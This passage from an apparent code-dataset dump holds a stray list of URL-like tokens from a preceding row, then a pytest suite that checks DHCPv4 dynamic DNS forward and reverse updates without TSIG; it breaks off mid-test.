'obj.an'], ['URL', 'obj.ai'], ['URL', 'obj.sc'], ['URL', 'obj.ar'], ['URL', 'obj.in'], ['URL', 'helpers.ma'], ['URL', 'obj.im'], ['URL', 'obj.net'], ['URL', 'obj.st'], ['URL', 'helpers.tr'], ['URL', 'obj.ne'], ['URL', 'sbdatetime.sbdatetime.co'], ['URL', 'timezones.pa'], ['URL', 'obj.ne'], ['URL', 'sbdatetime.sbdatetime.sb'], ['URL', 'sbdatetime.sbdatetime.sb'], ['URL', 'thetvdb.com'], ['URL', 'self.in'], ['URL', 'self.ch'], ['URL', 'self.ch'], ['URL', 'self.in'], ['URL', 'self.ch'], ['URL', 'self.ar'], ['URL', 'self.ch'], ['URL', 'self.ch'], ['URL', 'self.su'], ['URL', 'self.ch'], ['URL', 'sickbeard.US'], ['URL', 'Show.fi'], ['URL', 'sickbeard.sh'], ['URL', 'self.in'], ['URL', 'os.path.is'], ['URL', 'self.in'], ['URL', 'self.in'], ['URL', 'Quality.SD'], ['URL', 'Quality.SD'], ['URL', 'self.in'], ['URL', 'self.in'], ['URL', 'self.ar'], ['URL', 'self.ar'], ['URL', 'Quality.com'], ['URL', 'sickbeard.showQueueScheduler.action.ad'], ['URL', 'self.in'], ['URL', 'sickbeard.ST'], ['URL', 'self.su'], ['URL', 'sickbeard.ST'], ['URL', 'self.ar'], ['URL', 'thetvdb.com'], ['URL', 'self.va'], ['URL', 'sickbeard.in'], ['URL', 'self.in'], ['URL', 'self.ch'], ['URL', 'self.ch'], ['URL', 'self.in'], ['URL', 'self.ch'], ['URL', 'self.ar'], ['URL', 'self.ch'], ['URL', 'self.ch'], ['URL', 'self.st'], ['URL', 'self.ch'], ['URL', 'self.la'], ['URL', 'self.ch'], ['URL', 'sickbeard.IN'], ['URL', 'self.va'], ['URL', 'languages.ke'], ['URL', 'self.su'], ['URL', 'self.ch'], ['URL', 'sickbeard.US'], ['URL', 'self.an'], ['URL', 'self.ch'], ['URL', 'sickbeard.AN'], ['URL', 'self.sc'], ['URL', 'self.ch'], ['URL', 'sickbeard.SC'], ['URL', 'self.ch'], ['URL', 'self.ar'], ['URL', 'self.ch'], ['URL', 'sickbeard.AR'], ['URL', 'Show.fi'], ['URL', 'sickbeard.sh'], ['URL', 'self.in'], ['URL', 'sickbeard.RO'], ['URL', 'sickbeard.RO'], ['URL', 'sickbeard.RO'], ['URL', 'os.path.is'], ['URL', 'Quality.SD'], ['URL', 'Quality.SD'], ['URL', 'self.in'], ['URL', 'self.in'], ['URL', 'self.ar'], ['URL', 'self.ar'], ['URL', 'Quality.com'], ['URL', 'sickbeard.ST'], ['URL', 'self.st'], ['URL', 'self.st'], ['URL', 'self.st'], ['URL', 'self.st'], ['URL', 'self.st'], ['URL', 'self.st'], ['URL', 'sickbeard.ST'], ['URL', 'self.in'], ['URL', 'self.in'], ['URL', 'os.path.jo'], ['URL', 'sickbeard.AD'], ['URL', 'config.in'], ['URL', 'helpers.ma'], ['URL', 'logger.ER'], ['URL', 'helpers.ch'], ['URL', 'sickbeard.showQueueScheduler.action.ad'], ['URL', 'self.in'], ['URL', 
'self.la'], ['URL', 'self.su'], ['URL', 'self.an'], ['URL', 'self.sc'], ['URL', 'self.ar'], ['URL', 'thetvdb.com'], ['URL', 'self.in'], ['URL', 'self.ch'], ['URL', 'Show.fi'], ['URL', 'sickbeard.sh'], ['URL', 'self.in'], ['URL', 'show.ca'], ['URL', 'cache.Im'], ['URL', 'os.path.is'], ['URL', 'obj.in'], ['URL', 'os.path.is'], ['URL', 'obj.ba'], ['URL', 'obj.in'], ['URL', 'thetvdb.com'], ['URL', 'self.in'], ['URL', 'self.ch'], ['URL', 'self.re'], ['URL', 'self.ch'], ['URL', 'Show.de'], ['URL', 'self.in'], ['URL', 'self.re'], ['URL', 'show.na'], ['URL', 'thetvdb.com'], ['URL', 'self.in'], ['URL', 'self.ch'], ['URL', 'Show.fi'], ['URL', 'sickbeard.sh'], ['URL', 'self.in'], ['URL', 'thetvdb.com'], ['URL', 'self.in'], ['URL', 'self.ch'], ['URL', 'self.in'], ['URL', 'thetvdb.com'], ['URL', 'self.in'], ['URL', 'self.ch'], ['URL', 'self.in'], ['URL', 'thetvdb.com'], ['URL', 'self.in'], ['URL', 'self.ch'], ['URL', 'self.in'], ['URL', 'thetvdb.com'], ['URL', 'self.in'], ['URL', 'self.ch'], ['URL', 'self.in'], ['URL', 'thetvdb.com'], ['URL', 'self.in'], ['URL', 'self.ch'], ['URL', 'self.pa'], ['URL', 'self.ch'], ['URL', 'Show.pa'], ['URL', 'self.in'], ['URL', 'self.pa'], ['URL', 'show.na'], ['URL', 'show.pa'], ['URL', 'thetvdb.com'], ['URL', 'self.in'], ['URL', 'self.ch'], ['URL', 'Show.re'], ['URL', 'self.in'], ['URL', 'show.na'], ['URL', 'thetvdb.com'], ['URL', 'self.in'], ['URL', 'self.ch'], ['URL', 'self.so'], ['URL', 'self.ch'], ['URL', 'Show.fi'], ['URL', 'sickbeard.sh'], ['URL', 'self.in'], ['URL', 'self.so'], ['URL', 'db.se'], ['URL', 'self.in'], ['URL', 'db.se'], ['URL', 'self.in'], ['URL', 'thetvdb.com'], ['URL', 'self.in'], ['URL', 'self.ch'], ['URL', 'self.se'], ['URL', 'self.ch'], ['URL', 'Show.fi'], ['URL', 'sickbeard.sh'], ['URL', 'self.in'], ['URL', 'self.se'], ['URL', 'db.se'], ['URL', 'self.in'], ['URL', 'helpers.tr'], ['URL', 'sbdatetime.sbdatetime.co'], ['URL', 'timezones.pa'], ['URL', 'obj.ai'], ['URL', 'obj.net'], ['URL', 'sbdatetime.sbdatetime.sb'], ['URL', 'db.se'], ['URL', 'self.in'], ['URL', 'self.se'], ['URL', 'helpers.tr'], ['URL', 'sbdatetime.sbdatetime.co'], ['URL', 'timezones.pa'], ['URL', 'obj.ai'], ['URL', 'obj.net'], ['URL', 'sbdatetime.sbdatetime.sb'], ['URL', 'thetvdb.com'], ['URL', 'self.in'], ['URL', 'self.ch'], ['URL', 'self.ar'], ['URL', 'self.ch'], ['URL', 'self.in'], ['URL', 'self.ch'], ['URL', 'self.ar'], ['URL', 'self.ch'], ['URL', 'Show.fi'], ['URL', 'sickbeard.sh'], ['URL', 'self.in'], ['URL', 'Quality.SD'], ['URL', 'Quality.SD'], ['URL', 'self.in'], ['URL', 'self.in'], ['URL', 'self.ar'], ['URL', 'self.ar'], ['URL', 'Quality.com'], ['URL', 'obj.na'], ['URL', 'thetvdb.com'], ['URL', 'self.in'], ['URL', 'self.ch'], ['URL', 'Show.fi'], ['URL', 'sickbeard.sh'], ['URL', 'self.in'], ['URL', 'Quality.DO'], ['URL', 'Quality.AR'], ['URL', 'Quality.NO'], ['URL', 'Quality.SN'], ['URL', 'Quality.SN'], ['URL', 'Quality.NO'], ['URL', 'db.se'], ['URL', 'self.in'], ['URL', 'Quality.DO'], ['URL', 'Quality.AR'], ['URL', 'Quality.SN'], ['URL', 'Quality.SN'], ['URL', 'thetvdb.com'], ['URL', 'self.in'], ['URL', 'self.ch'], ['URL', 'Show.fi'], ['URL', 'sickbeard.sh'], ['URL', 'self.in'], ['URL', 'sickbeard.showQueueScheduler.ac'], ['URL', 'obj.na'], ['URL', 'logger.DE'], ['URL', 'obj.na'], ['URL', 'self.so'], ['URL', 'self.ch'], ['URL', 'self.pa'], ['URL', 'self.ch'], ['URL', 'sickbeard.sh'], ['URL', 'self.pa'], ['URL', 'curShow.pa'], ['URL', 'helpers.ma'], ['URL', 'curShow.pa'], ['URL', 'curShow.la'], ['URL', 'curShow.ai'], ['URL', 'curShow.an'], ['URL', 'curShow.in'], 
['URL', 'curShow.net'], ['URL', 'curShow.na'], ['URL', 'curShow.st'], ['URL', 'curShow.su'], ['URL', 'helpers.tr'], ['URL', 'curShow.ne'], ['URL', 'sbdatetime.sbdatetime.co'], ['URL', 'timezones.pa'], ['URL', 'curShow.ne'], ['URL', 'curShow.ai'], ['URL', 'sbdatetime.sbdatetime.sb'], ['URL', 'curShow.in'], ['URL', 'self.so'], ['URL', 'curShow.na'], ['URL', 'curShow.in'], ['URL', 'episode.se'], ['URL', 'episode.se'], ['URL', 'episode.su'], ['URL', 'history.cl'], ['URL', 'history.tr'], ['URL', 'sb.ad'], ['URL', 'sb.ch'], ['URL', 'sb.ch'], ['URL', 'sb.de'], ['URL', 'sb.ge'], ['URL', 'sb.ge'], ['URL', 'sb.ge'], ['URL', 'sb.pa'], ['URL', 'sb.re'], ['URL', 'sb.se'], ['URL', 'sb.se'], ['URL', 'sb.se'], ['URL', 'sb.se'], ['URL', 'sb.sh'], ['URL', 'show.ad'], ['URL', 'show.ad'], ['URL', 'show.ca'], ['URL', 'show.de'], ['URL', 'show.ge'], ['URL', 'show.ge'], ['URL', 'show.ge'], ['URL', 'show.ge'], ['URL', 'show.ge'], ['URL', 'show.pa'], ['URL', 'show.re'], ['URL', 'show.se'], ['URL', 'show.se'], ['URL', 'show.se'], ['URL', 'show.st'], ['URL', 'shows.st']]" +12,"""""""DDNS without TSIG"""""" + +# pylint: disable=invalid-name,line-too-long + +import pytest + +import misc +import srv_control +import srv_msg + + +@pytest.mark.v4 +@pytest.mark.ddns +@pytest.mark.notsig +@pytest.mark.forward_reverse_add +def test_ddns4_notsig_forw_and_rev_add_success_Sflag(): + + misc.test_setup() + srv_control.config_srv_subnet('192.168.50.0/24', '127.0.0.1-127.0.0.1') + srv_control.add_ddns_server('127.0.0.1', '53001') + srv_control.add_ddns_server_options('enable-updates', True) + srv_control.add_ddns_server_options('generated-prefix', 'four') + srv_control.add_ddns_server_options('qualifying-suffix', 'example.com') + srv_control.add_forward_ddns('four.example.com.', 'EMPTY_KEY') + srv_control.add_reverse_ddns('50.168.192.in-addr.arpa.', 'EMPTY_KEY') + srv_control.build_and_send_config_files() + srv_control.start_srv('DHCP', 'started') + + srv_control.use_dns_set_number(20) + srv_control.start_srv('DNS', 'started') + + misc.test_procedure() + srv_msg.dns_question_record('aa.four.example.com', 'A', 'IN') + srv_msg.client_send_dns_query() + + misc.pass_criteria() + srv_msg.send_wait_for_query('MUST') + srv_msg.dns_option('ANSWER', expect_include=False) + + misc.test_procedure() + srv_msg.client_requests_option(1) + srv_msg.client_send_msg('DISCOVER') + + misc.pass_criteria() + srv_msg.send_wait_for_message('MUST', 'OFFER') + srv_msg.response_check_include_option(1) + srv_msg.response_check_content('yiaddr', '127.0.0.1') + srv_msg.response_check_option_content(1, 'value', '127.0.0.1') + + misc.test_procedure() + srv_msg.client_copy_option('server_id') + srv_msg.client_does_include_with_value('requested_addr', '127.0.0.1') + srv_msg.client_requests_option(1) + srv_msg.client_sets_value('Client', 'FQDN_domain_name', 'aa.four.example.com.') + srv_msg.client_sets_value('Client', 'FQDN_flags', 'S') + srv_msg.client_does_include('Client', 'fqdn') + srv_msg.client_send_msg('REQUEST') + + misc.pass_criteria() + srv_msg.send_wait_for_message('MUST', 'ACK') + srv_msg.response_check_content('yiaddr', '127.0.0.1') + srv_msg.response_check_include_option(1) + srv_msg.response_check_option_content(1, 'value', '127.0.0.1') + srv_msg.response_check_include_option(81) + srv_msg.response_check_option_content(81, 'flags', 1) + srv_msg.response_check_option_content(81, 'fqdn', 'aa.four.example.com.') + + misc.test_procedure() + srv_msg.dns_question_record('aa.four.example.com', 'A', 'IN') + srv_msg.client_send_dns_query() + + 
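+ # The ACK above should have triggered the forward (A) update, so the query must now resolve to the leased address.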
misc.pass_criteria() + srv_msg.send_wait_for_query('MUST') + srv_msg.dns_option('ANSWER') + srv_msg.dns_option_content('ANSWER', 'rdata', '127.0.0.1') + srv_msg.dns_option_content('ANSWER', 'rrname', 'aa.four.example.com.') + + misc.test_procedure() + srv_msg.dns_question_record('127.0.0.1.in-addr.arpa.', 'PTR', 'IN') + srv_msg.client_send_dns_query() + + misc.pass_criteria() + srv_msg.send_wait_for_query('MUST') + srv_msg.dns_option('ANSWER') + srv_msg.dns_option_content('ANSWER', 'rdata', 'aa.four.example.com.') + srv_msg.dns_option_content('ANSWER', 'rrname', '127.0.0.1.in-addr.arpa.') + + +@pytest.mark.v4 +@pytest.mark.ddns +@pytest.mark.notsig +@pytest.mark.forward_reverse_add +def test_ddns4_notsig_forw_and_rev_add_fail_Sflag(): + + misc.test_setup() + srv_control.config_srv_subnet('192.168.50.0/24', '127.0.0.1-127.0.0.1') + srv_control.add_ddns_server('127.0.0.1', '53001') + srv_control.add_ddns_server_options('enable-updates', True) + srv_control.add_ddns_server_options('generated-prefix', 'four') + srv_control.add_ddns_server_options('qualifying-suffix', 'example.com') + srv_control.add_forward_ddns('four.example.com.', 'EMPTY_KEY') + srv_control.add_reverse_ddns('50.168.192.in-addr.arpa.', 'EMPTY_KEY') + srv_control.build_and_send_config_files() + srv_control.start_srv('DHCP', 'started') + + srv_control.use_dns_set_number(20) + srv_control.start_srv('DNS', 'started') + + misc.test_procedure() + srv_msg.dns_question_record('aa.four.example.com', 'A', 'IN') + srv_msg.client_send_dns_query() + + misc.pass_criteria() + srv_msg.send_wait_for_query('MUST') + srv_msg.dns_option('ANSWER', expect_include=False) + + misc.test_procedure() + srv_msg.client_requests_option(1) + srv_msg.client_send_msg('DISCOVER') + + misc.pass_criteria() + srv_msg.send_wait_for_message('MUST', 'OFFER') + srv_msg.response_check_include_option(1) + srv_msg.response_check_content('yiaddr', '127.0.0.1') + srv_msg.response_check_option_content(1, 'value', '127.0.0.1') + + misc.test_procedure() + srv_msg.client_copy_option('server_id') + srv_msg.client_does_include_with_value('requested_addr', '127.0.0.1') + srv_msg.client_requests_option(1) + srv_msg.client_sets_value('Client', 'FQDN_domain_name', 'aa.four.exae.com.') + srv_msg.client_sets_value('Client', 'FQDN_flags', 'S') + srv_msg.client_does_include('Client', 'fqdn') + srv_msg.client_send_msg('REQUEST') + + misc.pass_criteria() + srv_msg.send_wait_for_message('MUST', 'ACK') + srv_msg.response_check_content('yiaddr', '127.0.0.1') + srv_msg.response_check_include_option(1) + srv_msg.response_check_option_content(1, 'value', '127.0.0.1') + srv_msg.response_check_include_option(81) + srv_msg.response_check_option_content(81, 'flags', 1) + srv_msg.response_check_option_content(81, 'fqdn', 'aa.four.exae.com.') + + misc.test_procedure() + srv_msg.dns_question_record('aa.four.example.com', 'A', 'IN') + srv_msg.client_send_dns_query() + + misc.pass_criteria() + srv_msg.send_wait_for_query('MUST') + srv_msg.dns_option('ANSWER', expect_include=False) + + misc.test_procedure() + srv_msg.dns_question_record('127.0.0.1.in-addr.arpa.', 'PTR', 'IN') + srv_msg.client_send_dns_query() + + misc.pass_criteria() + srv_msg.send_wait_for_query('MUST') + srv_msg.dns_option('ANSWER', expect_include=False) + + +@pytest.mark.v4 +@pytest.mark.ddns +@pytest.mark.notsig +@pytest.mark.forward_reverse_add +def test_ddns4_notsig_forw_and_rev_notenabled_Sflag(): + + misc.test_setup() + srv_control.config_srv_subnet('192.168.50.0/24', '127.0.0.1-127.0.0.1') + 
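+ # Note: only four.example.com. is configured as the forward zone below, while the client will request a name under four.exae.com., so no DNS update can succeed.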
srv_control.add_ddns_server('127.0.0.1', '53001') + srv_control.add_ddns_server_options('enable-updates', False) + srv_control.add_ddns_server_options('generated-prefix', 'four') + srv_control.add_ddns_server_options('qualifying-suffix', 'example.com') + srv_control.add_forward_ddns('four.example.com.', 'EMPTY_KEY') + srv_control.add_reverse_ddns('50.168.192.in-addr.arpa.', 'EMPTY_KEY') + srv_control.build_and_send_config_files() + srv_control.start_srv('DHCP', 'started') + + srv_control.use_dns_set_number(20) + srv_control.start_srv('DNS', 'started') + + misc.test_procedure() + srv_msg.dns_question_record('aa.four.example.com', 'A', 'IN') + srv_msg.client_send_dns_query() + + misc.pass_criteria() + srv_msg.send_wait_for_query('MUST') + srv_msg.dns_option('ANSWER', expect_include=False) + + misc.test_procedure() + srv_msg.client_requests_option(1) + srv_msg.client_send_msg('DISCOVER') + + misc.pass_criteria() + srv_msg.send_wait_for_message('MUST', 'OFFER') + srv_msg.response_check_include_option(1) + srv_msg.response_check_content('yiaddr', '127.0.0.1') + srv_msg.response_check_option_content(1, 'value', '127.0.0.1') + + misc.test_procedure() + srv_msg.client_copy_option('server_id') + srv_msg.client_does_include_with_value('requested_addr', '127.0.0.1') + srv_msg.client_requests_option(1) + srv_msg.client_sets_value('Client', 'FQDN_domain_name', 'aa.four.example.com.') + srv_msg.client_sets_value('Client', 'FQDN_flags', 'S') + srv_msg.client_does_include('Client', 'fqdn') + srv_msg.client_send_msg('REQUEST') + + misc.pass_criteria() + srv_msg.send_wait_for_message('MUST', 'ACK') + srv_msg.response_check_content('yiaddr', '127.0.0.1') + srv_msg.response_check_include_option(1) + srv_msg.response_check_option_content(1, 'value', '127.0.0.1') + srv_msg.response_check_include_option(81) + # Response option 81 MUST contain flags 10. 
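+ # (Option 81 flag bits, per RFC 4702: S=1, O=2, E=4, N=8, so a value of 10 means N and O are set.)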
# TODO: verify the 'S', 'N' and 'O' bits individually once the server sets them; together the flags value should be 10 + srv_msg.response_check_option_content(81, 'fqdn', 'aa.four.example.com.') + + misc.test_procedure() + srv_msg.dns_question_record('aa.four.example.com', 'A', 'IN') + srv_msg.client_send_dns_query() + + misc.pass_criteria() + srv_msg.send_wait_for_query('MUST') + srv_msg.dns_option('ANSWER', expect_include=False) + + misc.test_procedure() + srv_msg.dns_question_record('127.0.0.1.in-addr.arpa.', 'PTR', 'IN') + srv_msg.client_send_dns_query() + + misc.pass_criteria() + srv_msg.send_wait_for_query('MUST') + srv_msg.dns_option('ANSWER', expect_include=False) + + +@pytest.mark.v4 +@pytest.mark.ddns +@pytest.mark.notsig +@pytest.mark.forward_update +def test_ddns4_notsig_forw_and_rev_update_success_Sflag(): + + misc.test_setup() + srv_control.config_srv_subnet('192.168.50.0/24', '127.0.0.1-127.0.0.1') + srv_control.add_ddns_server('127.0.0.1', '53001') + srv_control.add_ddns_server_options('enable-updates', True) + srv_control.add_ddns_server_options('generated-prefix', 'four') + srv_control.add_ddns_server_options('qualifying-suffix', 'example.com') + srv_control.add_forward_ddns('four.example.com.', 'EMPTY_KEY') + srv_control.add_reverse_ddns('50.168.192.in-addr.arpa.', 'EMPTY_KEY') + srv_control.build_and_send_config_files() + srv_control.start_srv('DHCP', 'started') + + srv_control.use_dns_set_number(20) + srv_control.start_srv('DNS', 'started') + + misc.test_procedure() + srv_msg.dns_question_record('aa.four.example.com', 'A', 'IN') + srv_msg.client_send_dns_query() + + misc.pass_criteria() + srv_msg.send_wait_for_query('MUST') + srv_msg.dns_option('ANSWER', expect_include=False) + + misc.test_procedure() + srv_msg.client_requests_option(1) + srv_msg.client_send_msg('DISCOVER') + + misc.pass_criteria() + srv_msg.send_wait_for_message('MUST', 'OFFER') + srv_msg.response_check_include_option(1) + srv_msg.response_check_content('yiaddr', '127.0.0.1') + srv_msg.response_check_option_content(1, 'value', '127.0.0.1') + + misc.test_procedure() + srv_msg.client_copy_option('server_id') + srv_msg.client_does_include_with_value('requested_addr', '127.0.0.1') + srv_msg.client_requests_option(1) + srv_msg.client_sets_value('Client', 'FQDN_domain_name', 'aa.four.example.com.') + srv_msg.client_sets_value('Client', 'FQDN_flags', 'S') + srv_msg.client_does_include('Client', 'fqdn') + srv_msg.client_send_msg('REQUEST') + + misc.pass_criteria() + srv_msg.send_wait_for_message('MUST', 'ACK') + srv_msg.response_check_content('yiaddr', '127.0.0.1') + srv_msg.response_check_include_option(1) + srv_msg.response_check_option_content(1, 'value', '127.0.0.1') + srv_msg.response_check_include_option(81) + srv_msg.response_check_option_content(81, 'flags', 1) + srv_msg.response_check_option_content(81, 'fqdn', 'aa.four.example.com.') + + misc.test_procedure() + srv_msg.dns_question_record('aa.four.example.com', 'A', 'IN') + srv_msg.client_send_dns_query() + + misc.pass_criteria() + srv_msg.send_wait_for_query('MUST') + srv_msg.dns_option('ANSWER') + srv_msg.dns_option_content('ANSWER', 'rdata', '127.0.0.1') + srv_msg.dns_option_content('ANSWER', 'rrname', 'aa.four.example.com.') + + misc.test_procedure() + srv_msg.dns_question_record('127.0.0.1.in-addr.arpa.', 'PTR', 'IN') + srv_msg.client_send_dns_query() + + misc.pass_criteria() + srv_msg.send_wait_for_query('MUST') + srv_msg.dns_option('ANSWER') + srv_msg.dns_option_content('ANSWER', 'rdata', 'aa.four.example.com.') + srv_msg.dns_option_content('ANSWER', 'rrname', '127.0.0.1.in-addr.arpa.') + + misc.test_setup() + 
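+ # Stop the DHCP server and wipe the lease file so the client below re-registers from scratch and the update path runs again.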
srv_control.start_srv('DHCP', 'stopped') + srv_control.clear_some_data('leases') + + misc.test_setup() + srv_control.config_srv_subnet('192.168.50.0/24', '127.0.0.1-127.0.0.1') + srv_control.add_ddns_server('127.0.0.1', '53001') + srv_control.add_ddns_server_options('enable-updates', True) + srv_control.add_ddns_server_options('generated-prefix', 'four') + srv_control.add_ddns_server_options('qualifying-suffix', 'example.com') + srv_control.add_forward_ddns('four.example.com.', 'EMPTY_KEY') + srv_control.add_reverse_ddns('50.168.192.in-addr.arpa.', 'EMPTY_KEY') + srv_control.build_and_send_config_files() + srv_control.start_srv('DHCP', 'started') + + misc.test_procedure() + srv_msg.dns_question_record('aa.four.example.com', 'A', 'IN') + srv_msg.client_send_dns_query() + + misc.pass_criteria() + srv_msg.send_wait_for_query('MUST') + srv_msg.dns_option('ANSWER') + srv_msg.dns_option_content('ANSWER', 'rdata', '127.0.0.1') + srv_msg.dns_option_content('ANSWER', 'rrname', 'aa.four.example.com.') + + misc.test_procedure() + srv_msg.dns_question_record('127.0.0.1.in-addr.arpa.', 'PTR', 'IN') + srv_msg.client_send_dns_query() + + misc.pass_criteria() + srv_msg.send_wait_for_query('MUST') + srv_msg.dns_option('ANSWER') + srv_msg.dns_option_content('ANSWER', 'rdata', 'aa.four.example.com.') + srv_msg.dns_option_content('ANSWER', 'rrname', '127.0.0.1.in-addr.arpa.') + + misc.test_procedure() + srv_msg.client_requests_option(1) + srv_msg.client_send_msg('DISCOVER') + + misc.pass_criteria() + srv_msg.send_wait_for_message('MUST', 'OFFER') + srv_msg.response_check_include_option(1) + srv_msg.response_check_content('yiaddr', '127.0.0.1') + srv_msg.response_check_option_content(1, 'value', '127.0.0.1') + + misc.test_procedure() + srv_msg.client_copy_option('server_id') + srv_msg.client_does_include_with_value('requested_addr', '127.0.0.1') + srv_msg.client_requests_option(1) + srv_msg.client_sets_value('Client', 'FQDN_domain_name', 'aa.four.example.com.') + srv_msg.client_sets_value('Client', 'FQDN_flags', 'S') + srv_msg.client_does_include('Client', 'fqdn') + srv_msg.client_send_msg('REQUEST') + + misc.pass_criteria() + srv_msg.send_wait_for_message('MUST', 'ACK') + srv_msg.response_check_content('yiaddr', '127.0.0.1') + srv_msg.response_check_include_option(1) + srv_msg.response_check_option_content(1, 'value', '127.0.0.1') + srv_msg.response_check_include_option(81) + srv_msg.response_check_option_content(81, 'flags', 1) + srv_msg.response_check_option_content(81, 'fqdn', 'aa.four.example.com.') + + misc.test_procedure() + srv_msg.dns_question_record('aa.four.example.com', 'A', 'IN') + srv_msg.client_send_dns_query() + + misc.pass_criteria() + srv_msg.send_wait_for_query('MUST') + srv_msg.dns_option('ANSWER') + srv_msg.dns_option_content('ANSWER', 'rdata', '127.0.0.1') + srv_msg.dns_option_content('ANSWER', 'rrname', 'aa.four.example.com.') + + misc.test_procedure() + srv_msg.dns_question_record('127.0.0.1.in-addr.arpa.', 'PTR', 'IN') + srv_msg.client_send_dns_query() + + misc.pass_criteria() + srv_msg.send_wait_for_query('MUST') + srv_msg.dns_option('ANSWER') + srv_msg.dns_option_content('ANSWER', 'rdata', 'aa.four.example.com.') + srv_msg.dns_option_content('ANSWER', 'rrname', '127.0.0.1.in-addr.arpa.') + + +@pytest.mark.v4 +@pytest.mark.ddns +@pytest.mark.notsig +@pytest.mark.forward_reverse_add +def test_ddns4_notsig_forw_and_rev_two_dhci_Sflag(): + + misc.test_setup() + srv_control.config_srv_subnet('192.168.50.0/24', '127.0.0.1-127.0.0.1') + srv_control.add_ddns_server('127.0.0.1', '53001') + 
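+ # Two clients, distinguished only by chaddr, will each register their own FQDN in the same zone.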
srv_control.add_ddns_server_options('enable-updates', True) + srv_control.add_ddns_server_options('generated-prefix', 'four') + srv_control.add_ddns_server_options('qualifying-suffix', 'example.com') + srv_control.add_forward_ddns('four.example.com.', 'EMPTY_KEY') + srv_control.add_reverse_ddns('50.168.192.in-addr.arpa.', 'EMPTY_KEY') + srv_control.build_and_send_config_files() + srv_control.start_srv('DHCP', 'started') + + srv_control.use_dns_set_number(20) + srv_control.start_srv('DNS', 'started') + + misc.test_procedure() + srv_msg.dns_question_record('client1.four.example.com', 'A', 'IN') + srv_msg.client_send_dns_query() + + misc.pass_criteria() + srv_msg.send_wait_for_query('MUST') + srv_msg.dns_option('ANSWER', expect_include=False) + + misc.test_procedure() + srv_msg.dns_question_record('client2.four.example.com', 'A', 'IN') + srv_msg.client_send_dns_query() + + misc.pass_criteria() + srv_msg.send_wait_for_query('MUST') + srv_msg.dns_option('ANSWER', expect_include=False) + + misc.test_procedure() + srv_msg.client_sets_value('Client', 'chaddr', '00:00:00:00:00:11') + srv_msg.client_send_msg('DISCOVER') + + misc.pass_criteria() + srv_msg.send_wait_for_message('MUST', 'OFFER') + srv_msg.response_check_include_option(1) + srv_msg.response_check_content('yiaddr', '127.0.0.1') + srv_msg.response_check_option_content(1, 'value', '127.0.0.1') + + misc.test_procedure() + srv_msg.client_sets_value('Client', 'chaddr', '00:00:00:00:00:11') + srv_msg.client_copy_option('server_id') + srv_msg.client_does_include_with_value('requested_addr', '127.0.0.1') + srv_msg.client_requests_option(1) + srv_msg.client_sets_value('Client', 'FQDN_domain_name', 'client1.four.example.com.') + srv_msg.client_sets_value('Client', 'FQDN_flags', 'S') + srv_msg.client_does_include('Client', 'fqdn') + srv_msg.client_send_msg('REQUEST') + + misc.pass_criteria() + srv_msg.send_wait_for_message('MUST', 'ACK') + srv_msg.response_check_content('yiaddr', '127.0.0.1') + srv_msg.response_check_include_option(1) + srv_msg.response_check_option_content(1, 'value', '127.0.0.1') + srv_msg.response_check_include_option(81) + srv_msg.response_check_option_content(81, 'flags', 1) + srv_msg.response_check_option_content(81, 'fqdn', 'client1.four.example.com.') + + misc.test_procedure() + srv_msg.dns_question_record('client1.four.example.com', 'A', 'IN') + srv_msg.client_send_dns_query() + + misc.pass_criteria() + srv_msg.send_wait_for_query('MUST') + srv_msg.dns_option('ANSWER') + srv_msg.dns_option_content('ANSWER', 'rdata', '127.0.0.1') + srv_msg.dns_option_content('ANSWER', 'rrname', 'client1.four.example.com.') + + # Client 2 add + misc.test_procedure() + srv_msg.client_sets_value('Client', 'chaddr', '00:00:00:00:00:12') + srv_msg.client_send_msg('DISCOVER') + + misc.pass_criteria() + srv_msg.send_wait_for_message('MUST', 'OFFER') + srv_msg.response_check_include_option(1) + srv_msg.response_check_content('yiaddr', '127.0.0.1') + srv_msg.response_check_option_content(1, 'value', '127.0.0.1') + + misc.test_procedure() + srv_msg.client_sets_value('Client', 'chaddr', '00:00:00:00:00:12') + srv_msg.client_copy_option('server_id') + srv_msg.client_does_include_with_value('requested_addr', '127.0.0.1') + srv_msg.client_requests_option(1) + srv_msg.client_sets_value('Client', 'FQDN_domain_name', 'client2.four.example.com.') + srv_msg.client_sets_value('Client', 'FQDN_flags', 'S') + srv_msg.client_does_include('Client', 'fqdn') + srv_msg.client_send_msg('REQUEST') + + misc.pass_criteria() + srv_msg.send_wait_for_message('MUST', 'ACK') + 
srv_msg.response_check_content('yiaddr', '127.0.0.1') + srv_msg.response_check_include_option(1) + srv_msg.response_check_option_content(1, 'value', '127.0.0.1') + srv_msg.response_check_include_option(81) + srv_msg.response_check_option_content(81, 'flags', 1) + srv_msg.response_check_option_content(81, 'fqdn', 'client2.four.example.com.') + + misc.test_procedure() + srv_msg.dns_question_record('client2.four.example.com', 'A', 'IN') + srv_msg.client_send_dns_query() + + misc.pass_criteria() + srv_msg.send_wait_for_query('MUST') + srv_msg.dns_option('ANSWER') + srv_msg.dns_option_content('ANSWER', 'rdata', '127.0.0.1') + srv_msg.dns_option_content('ANSWER', 'rrname', 'client2.four.example.com.') + + +@pytest.mark.v4 +@pytest.mark.ddns +@pytest.mark.notsig +@pytest.mark.forward_reverse_add +def test_ddns4_notsig_forw_and_rev_dhci_conflicts_Sflag(): + + misc.test_setup() + srv_control.config_srv_subnet('192.168.50.0/24', '127.0.0.1-127.0.0.1') + srv_control.add_ddns_server('127.0.0.1', '53001') + srv_control.add_ddns_server_options('enable-updates', True) + srv_control.add_ddns_server_options('generated-prefix', 'four') + srv_control.add_ddns_server_options('qualifying-suffix', 'example.com') + srv_control.add_forward_ddns('four.example.com.', 'EMPTY_KEY') + srv_control.add_reverse_ddns('50.168.192.in-addr.arpa.', 'EMPTY_KEY') + srv_control.build_and_send_config_files() + srv_control.start_srv('DHCP', 'started') + + srv_control.use_dns_set_number(20) + srv_control.start_srv('DNS', 'started') + + misc.test_procedure() + srv_msg.dns_question_record('client1.four.example.com', 'A', 'IN') + srv_msg.client_send_dns_query() + + misc.pass_criteria() + srv_msg.send_wait_for_query('MUST') + srv_msg.dns_option('ANSWER', expect_include=False) + + misc.test_procedure() + srv_msg.dns_question_record('127.0.0.1.in-addr.arpa.', 'PTR', 'IN') + srv_msg.client_send_dns_query() + + misc.pass_criteria() + srv_msg.send_wait_for_query('MUST') + srv_msg.dns_option('ANSWER', expect_include=False) + + misc.test_procedure() + srv_msg.dns_question_record('client2.four.example.com', 'A', 'IN') + srv_msg.client_send_dns_query() + + misc.pass_criteria() + srv_msg.send_wait_for_query('MUST') + srv_msg.dns_option('ANSWER', expect_include=False) + + misc.test_procedure() + 